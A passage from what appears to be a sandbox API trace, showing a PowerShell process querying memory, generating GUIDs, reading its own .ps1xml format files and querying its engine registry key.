lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.163] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.163] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.163] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.163] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.163] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x43de896c, Data2=0xe09c, Data3=0x49e0, Data4=([0]=0xae, [1]=0xba, [2]=0xcb, [3]=0xa9, [4]=0x85, [5]=0x8c, [6]=0xa, [7]=0x5d))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xba4988da, Data2=0xda7, Data3=0x4e42, Data4=([0]=0x93, [1]=0x6b, [2]=0x2b, [3]=0x4d, [4]=0x26, [5]=0x44, [6]=0xf1, [7]=0xbb))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x7cec3c00, Data2=0x806f, Data3=0x416b, Data4=([0]=0xa7, [1]=0x39, [2]=0x84, [3]=0x2a, [4]=0x7, [5]=0x36, [6]=0x63, [7]=0x6e))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x356a32bb, Data2=0xfc6a, Data3=0x405a, Data4=([0]=0x98, [1]=0x24, [2]=0x2b, [3]=0x3b, [4]=0x4f, [5]=0xe8, [6]=0x33, [7]=0xee))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xac306627, Data2=0xe754, Data3=0x4166, Data4=([0]=0x93, [1]=0x4a, [2]=0xb0, [3]=0xee, [4]=0xcf, [5]=0x36, [6]=0x7, [7]=0xea))) returned 0x0 [0145.164] VirtualQuery (in: lpAddress=0x24d144, lpBuffer=0x24e144, dwLength=0x1c | out: lpBuffer=0x24e144*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd6696077, Data2=0xec55, Data3=0x401d, Data4=([0]=0xab, [1]=0xc5, [2]=0xd0, [3]=0xd7, [4]=0x17, [5]=0x7d, [6]=0x9, [7]=0x2a))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x7e08e8f6, Data2=0x2067, Data3=0x4b21, Data4=([0]=0xa9, [1]=0x8f, [2]=0x9f, [3]=0xd5, [4]=0x68, [5]=0x54, [6]=0xcd, [7]=0xcb))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x7adf6ca6, Data2=0x4bb, Data3=0x449f, Data4=([0]=0x9a, [1]=0xa1, [2]=0xe, [3]=0x1a, [4]=0x74, [5]=0xf5, [6]=0xe8, [7]=0x95))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1a06353e, Data2=0x5892, Data3=0x4adc, Data4=([0]=0x91, [1]=0xe0, [2]=0xb7, [3]=0xe7, [4]=0x2e, [5]=0xb, [6]=0x31, [7]=0x67))) returned 0x0 [0145.164] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa0d47b53, Data2=0xa168, Data3=0x4fef, Data4=([0]=0x86, [1]=0xb1, [2]=0xa2, [3]=0xb4, [4]=0xe7, [5]=0xb4, [6]=0xb1, [7]=0xed))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xdf5276c8, Data2=0x5607, Data3=0x4841, Data4=([0]=0xa6, [1]=0x2d, [2]=0xc4, [3]=0x4d, [4]=0x87, [5]=0x82, [6]=0xa2, [7]=0xe))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1e6f4055, Data2=0x5d11, Data3=0x422f, Data4=([0]=0xa8, [1]=0x52, [2]=0x49, [3]=0x4b, [4]=0x66, [5]=0x4f, [6]=0xd5, [7]=0x89))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd9cf2742, Data2=0x7f92, Data3=0x450b, Data4=([0]=0xb7, [1]=0x3f, [2]=0xca, [3]=0xc9, [4]=0x9e, [5]=0x62, [6]=0x56, [7]=0x7c))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x689c2774, Data2=0x7581, Data3=0x427f, Data4=([0]=0xaf, [1]=0x41, [2]=0xd6, [3]=0x51, [4]=0xe4, [5]=0x56, [6]=0xd7, [7]=0x95))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xf3a07b65, Data2=0xba14, Data3=0x49ee, Data4=([0]=0xa5, [1]=0x67, [2]=0xeb, [3]=0x99, [4]=0x0, [5]=0x6d, [6]=0x6b, [7]=0x94))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x23c5c6da, Data2=0xf3e1, Data3=0x4046, Data4=([0]=0x83, [1]=0xe2, [2]=0x15, [3]=0x50, [4]=0x5d, [5]=0x10, [6]=0x9b, [7]=0x67))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x47c8ded1, Data2=0xf23c, Data3=0x49bb, Data4=([0]=0xa1, [1]=0x8c, [2]=0x67, [3]=0xf4, [4]=0x6d, [5]=0xa9, [6]=0xc4, [7]=0x57))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x5e806258, Data2=0x22c7, Data3=0x4dea, Data4=([0]=0xbb, [1]=0x4, [2]=0xf6, [3]=0x99, [4]=0x2a, [5]=0x95, [6]=0x40, [7]=0xd6))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x687ea9e6, Data2=0xcba2, Data3=0x4a9e, Data4=([0]=0xa1, [1]=0xe4, [2]=0x42, [3]=0x6f, [4]=0xd0, [5]=0xf, [6]=0x29, [7]=0xba))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xe6e201e7, Data2=0x4be3, Data3=0x4c96, Data4=([0]=0xbc, [1]=0xbe, [2]=0xc, [3]=0x13, [4]=0xa5, [5]=0x4f, [6]=0x8c, [7]=0xc0))) returned 0x0 [0145.165] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x5f1f6fe, Data2=0x7867, Data3=0x484f, Data4=([0]=0x87, [1]=0x39, [2]=0x44, [3]=0x66, [4]=0x3b, [5]=0xe6, [6]=0x1b, [7]=0xa1))) returned 0x0 [0145.166] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xe1263dc0, Data2=0x2aef, Data3=0x430f, Data4=([0]=0x96, [1]=0xbc, [2]=0x73, [3]=0x28, [4]=0x3c, [5]=0xd6, [6]=0x7c, [7]=0xb2))) returned 0x0 [0145.166] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x8cda4792, Data2=0x411f, Data3=0x4980, Data4=([0]=0x8c, [1]=0xf2, [2]=0xbd, [3]=0x20, [4]=0x36, [5]=0xb1, [6]=0x2b, [7]=0x89))) returned 0x0 [0145.166] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa5a00496, Data2=0xde72, Data3=0x4d06, Data4=([0]=0xb3, [1]=0xd7, [2]=0x89, [3]=0xb1, [4]=0x3c, [5]=0x64, [6]=0x4a, [7]=0xf6))) returned 0x0 [0145.166] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.166] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.167] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.184] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x5c8a248f, Data2=0xef15, Data3=0x4952, Data4=([0]=0xbe, [1]=0xc0, [2]=0xce, [3]=0x4f, [4]=0xd9, [5]=0xa2, [6]=0xf, [7]=0xa7))) returned 0x0 [0145.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.185] GetLastError () returned 0x0 [0145.185] SetErrorMode (uMode=0x1) returned 0x1 [0145.185] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e4 [0145.185] GetLastError () returned 0x0 [0145.185] GetFileType (hFile=0x1e4) returned 0x1 [0145.185] SetErrorMode (uMode=0x1) returned 0x1 [0145.185] GetFileType (hFile=0x1e4) returned 0x1 [0145.185] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.187] GetLastError () returned 0x0 [0145.187] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.187] GetLastError () returned 0x0 [0145.187] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.187] GetLastError () returned 0x0 [0145.187] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.187] GetLastError () returned 0x0 [0145.188] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.188] GetLastError () returned 0x0 [0145.188] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.188] GetLastError () returned 0x0 [0145.188] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x119, lpOverlapped=0x0) returned 1 [0145.188] GetLastError () returned 0x0 [0145.188] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f4ff30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f4ff30*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.188] GetLastError () returned 0x0 [0145.188] CloseHandle (hObject=0x1e4) returned 1 [0145.188] GetLastError () returned 0x0 [0145.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.188] GetLastError () returned 0x0 [0145.188] SetErrorMode (uMode=0x1) returned 0x1 [0145.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f70f2c | out: lpFileInformation=0x2f70f2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0145.189] GetLastError () returned 0x0 [0145.189] SetErrorMode (uMode=0x1) returned 0x1 [0145.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.189] GetLastError () returned 0x0 [0145.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1e4) returned 0x0 [0145.189] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0145.189] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0145.189] RegCloseKey (hKey=0x1e4) returned 0x0 [0145.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.189] GetLastError () returned 0x0 [0145.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.189] GetLastError () returned 0x0 [0145.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.190] GetLastError () returned 0x0 [0145.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.190] GetLastError () returned 0x0 [0145.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.190] GetLastError () returned 0x0 [0145.191] VirtualQuery (in: lpAddress=0x24cfa0, lpBuffer=0x24dfa0, dwLength=0x1c | out: lpBuffer=0x24dfa0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.191] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x410fabab, Data2=0x15fa, Data3=0x4fb4, Data4=([0]=0x80, [1]=0xfc, [2]=0x44, [3]=0x90, [4]=0x31, [5]=0x13, [6]=0xf8, [7]=0x69))) returned 0x0 [0145.192] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.192] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x44c357ca, Data2=0x78be, Data3=0x4b83, Data4=([0]=0xa2, [1]=0xbc, [2]=0x55, [3]=0x54, [4]=0x96, [5]=0x96, [6]=0xca, [7]=0x2e))) returned 0x0 [0145.192] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x6cd22aa1, Data2=0x30fb, Data3=0x4774, Data4=([0]=0xa1, [1]=0xb5, [2]=0x83, [3]=0x64, [4]=0x69, [5]=0x29, [6]=0x4f, [7]=0xdb))) returned 0x0 [0145.192] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xfb89fc24, Data2=0x521f, Data3=0x490e, Data4=([0]=0x97, [1]=0x6d, [2]=0xcd, [3]=0x6f, [4]=0x60, [5]=0x8d, [6]=0xf5, [7]=0xe4))) returned 0x0 [0145.192] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.192] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0145.192] GetLastError () returned 0x0 [0145.192] SetErrorMode (uMode=0x1) returned 0x1 [0145.193] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e4 [0145.193] GetLastError () returned 0x0 [0145.193] GetFileType (hFile=0x1e4) returned 0x1 [0145.193] SetErrorMode (uMode=0x1) returned 0x1 [0145.193] GetFileType (hFile=0x1e4) returned 0x1 [0145.193] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.197] GetLastError () returned 0x0 [0145.197] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.197] GetLastError () returned 0x0 [0145.198] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.198] GetLastError () returned 0x0 [0145.198] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.198] GetLastError () returned 0x0 [0145.198] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.198] GetLastError () returned 0x0 [0145.198] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.200] GetLastError () returned 0x0 [0145.200] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.200] GetLastError () returned 0x0 [0145.200] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.200] GetLastError () returned 0x0 [0145.201] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.201] GetLastError () returned 0x0 [0145.202] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.202] GetLastError () returned 0x0 [0145.202] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.202] GetLastError () returned 0x0 [0145.202] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.202] GetLastError () returned 0x0 [0145.202] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.202] GetLastError () returned 0x0 [0145.202] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.202] GetLastError () returned 0x0 [0145.203] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.203] GetLastError () returned 0x0 [0145.204] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.204] GetLastError () returned 0x0 [0145.206] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.206] GetLastError () returned 0x0 [0145.206] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.206] GetLastError () returned 0x0 [0145.206] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.206] GetLastError () returned 0x0 [0145.206] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.206] GetLastError () returned 0x0 [0145.206] ReadFile (in: hFile=0x1e4, lpBuffer=0x2f99f54, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2f99f54*, lpNumberOfBytesRead=0x24e2c4*=0x1000, 